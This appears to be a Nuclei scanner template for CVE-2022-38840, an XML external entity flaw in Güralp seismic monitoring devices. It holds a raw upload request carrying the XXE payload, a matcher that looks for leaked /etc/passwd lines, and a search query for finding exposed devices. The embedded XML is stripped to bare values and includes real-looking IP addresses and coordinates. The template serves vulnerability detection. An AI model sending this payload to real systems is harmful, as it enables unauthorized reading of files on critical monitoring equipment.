id: CVE-2022-38840
info:
name: Güralp MAN-EAM-0003 3.2.4 - XML External Entity (XXE)
author: daffainfo
severity: high
description: |
cgi-bin/xmlstatus.cgi in Güralp MAN-EAM-0003 3.2.4 is vulnerable to an XML External Entity (XXE) issue via XML file upload, which leads to local file disclosure.
impact: |
Unauthenticated attackers can exploit XXE vulnerabilities in the xmlstatus.cgi component to read arbitrary files from the seismic monitoring system, potentially accessing sensitive configuration data and system credentials.
remediation: |
Update Güralp MAN-EAM-0003 to a version newer than 3.2.4 that disables external entity processing in XML parsers and validates uploaded XML files.
reference:
- https://www.exploit-db.com/exploits/51037
- https://nvd.nist.gov/vuln/detail/CVE-2022-38840
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2022-38840
cwe-id: CWE-611
epss-score: 0.60091
epss-percentile: 0.98311
cpe: cpe:2.3:a:guralp:man-eam-0003:3.2.4:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: guralp
product: man-eam-0003
google-query: "webconfig menu.cgi"
tags: cve,cve2022,guralp,man-eam-0003,xxe,vkev,vuln
http:
- raw:
- |
POST /cgi-bin/xmlstatus.cgi HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb84cALN1n8IDf7tQ
------WebKitFormBoundaryb84cALN1n8IDf7tQ
Content-Disposition: form-data; name="xml_file"; filename=""
Content-Type: application/octet-stream
------WebKitFormBoundaryb84cALN1n8IDf7tQ
Content-Disposition: form-data; name="xml_data"
]>
false
platinum
102
running
GPS
FLL
46196
true
2022-06-14T11:26:53Z
6.1e-08
running
never
4.6%
-0.3%
-0.3%
running
never
running
never
11374055
331
1567
0
16
5
7338920142
213600
gdi2gcf[default]
gdi-link-tx[default]
gdi2miniseed[default]
das-in
das-in-textstatus
DONB.HHZ.TM.00
DONB.HHN.TM.00
DONB.HHE.TM.00
DONB.HDF.TM.X0
DONB.HNZ.TM.10
DONB.HNN.TM.10
DONB.HNE.TM.10
DONB.MMZ.TM.00
DONB.MMN.TM.00
DONB.MME.TM.00
DONB.SOH.TM.0
DONB-AIB
DONB.SOH.TM.1
DONB-BIB
DONB.SOH.TM.X
DONB-XIB
11273973132
325518
1085.06
1565
0
7439096490
216516
11374055
331
100
DONB-AZ0
2022-06-14T11:26:46.000000000Z
CMG-DAS
0
1
100
DONB-AN0
2022-06-14T11:26:46.000000000Z
CMG-DAS
0
1
100
DONB-AE0
2022-06-14T11:26:45.000000000Z
CMG-DAS
0
1
100
DONB-XX0
2022-06-14T11:26:35.000000000Z
CMG-DAS
0
1
100
DONB-BZ0
2022-06-14T11:26:48.000000000Z
CMG-DAS
0
1
100
DONB-BN0
2022-06-14T11:26:42.000000000Z
CMG-DAS
0
1
100
DONB-BE0
2022-06-14T11:26:40.000000000Z
CMG-DAS
0
1
4
DONB-AM8
2022-06-14T11:24:48.000000000Z
CMG-DAS
0
4
DONB-AM9
2022-06-14T11:23:47.000000000Z
CMG-DAS
0
4
DONB-AMA
2022-06-14T11:23:57.000000000Z
CMG-DAS
0
nan
DONB-A00
CMG-DAS
0
nan
DONB-AIB
CMG-DAS
0
nan
DONB-B00
CMG-DAS
0
nan
DONB-BIB
CMG-DAS
0
nan
DONB-X00
CMG-DAS
0
nan
DONB-XIB
CMG-DAS
0
6184483152
180000
0
0
22682743
655
true
2022-06-14T11:26:53Z
3D
2022-06-14T11:26:53Z
13.909917
100.593734
3
26
12
2022-06-14T11:26:52Z
true
direct_gps
NTP is using a GPS reference source.
true
0.000131
GPS
127.127.28.1
GPS
22682743
655
3382931
7
123.160.221.22
21100
false
0
113.53.234.98
33964
false
0
203.114.125.67
48666
false
3221351
113.53.234.98
45158
false
3382931
221.128.101.50
55776
false
3382931
118.175.2.50
60818
false
3382931
203.114.125.67
53984
false
3382931
Inactive
Last flush good
2022-06-14T08:10:14Z
27.2%
17449811968
64134021120
VFAT
DAS-405D62
10307538
1.72
437809152
77.0%
&example;
15809
CMG-DAS
2021-04-08T05:06:17Z
2021-04-08T07:02:50Z
2021-04-08T08:00:33Z
2021-04-08T08:30:41Z
2021-04-08T08:39:15Z
2021-04-08T08:46:24Z
2021-04-08T10:08:51Z
2021-04-09T07:10:41Z
2021-10-07T06:48:35Z
2022-02-15T04:14:30Z
43.875
12.75
0.442
12.675
0.289
12.725
0.002
------WebKitFormBoundaryb84cALN1n8IDf7tQ
Content-Disposition: form-data; name="upload_xml"
Upload and view
------WebKitFormBoundaryb84cALN1n8IDf7tQ--
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "XML status"
- "Software repository label"
- "xmlstatus.cgi"
condition: and
- type: status
status:
- 200
# digest: 4a0a0047304502207babb5b4add72ce76ea2bdd5065d38e6d695e33949a259a627bac20ff9a9ff55022100937e70403b5e9241541d269917e304e609be99f16e9d0601bdfcf0efbedd12f2:922c64590222798bb761d5b6d8e72950